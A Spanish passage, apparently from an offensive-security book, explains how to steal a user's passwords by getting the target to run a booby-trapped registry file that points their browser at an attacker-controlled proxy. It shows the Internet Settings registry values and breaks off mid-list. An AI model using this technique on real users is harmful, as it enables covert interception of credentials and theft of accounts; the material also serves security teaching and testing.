Índice

¿Cómo recuperar una contraseña desde la red?

Las contraseñas circulan también a través de la red. Los sitios web, los programas o el acceso a recursos solicitan informaciones de la conexión. Vamos a aprovecharlo para recuperar las contraseñas.

1. Utilización de un proxy

Cuando el usuario accede a un sitio web o a una intranet, se le puede solicitar un nombre de usuario, así como una contraseña en un formulario web.

El navegador se conecta en la mayoría de los casos directamente a una intranet, pero a veces utiliza un proxy para hacerlo a un sitio web. El tráfico, incluida la contraseña, pasa, por lo tanto, por este proxy. Usaremos el mismo principio para recuperar la contraseña de un usuario que accede a una intranet o que usa un programa autentificándose por un webservice. Tenemos para esto dos tareas que realizar: poner en marcha un proxy que nos facilitará las informaciones buscadas y redirigir el tráfico web del usuario hacia nuestro proxy.

a. Configurar el objetivo

Para redirigir el tráfico, vamos a modificar el registro del usuario utilizando un programa o un archivo trampa (ver el capítulo Tomar el rol de administrador o de sistema).

Haga que el usuario objetivo ejecute la clave que modifica el registro.

HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings 
"MigrateProxy"=dword:00000001  
"ProxyEnable"=dword:00000001  
"ProxyHttp1.1"=dword:00000001   ...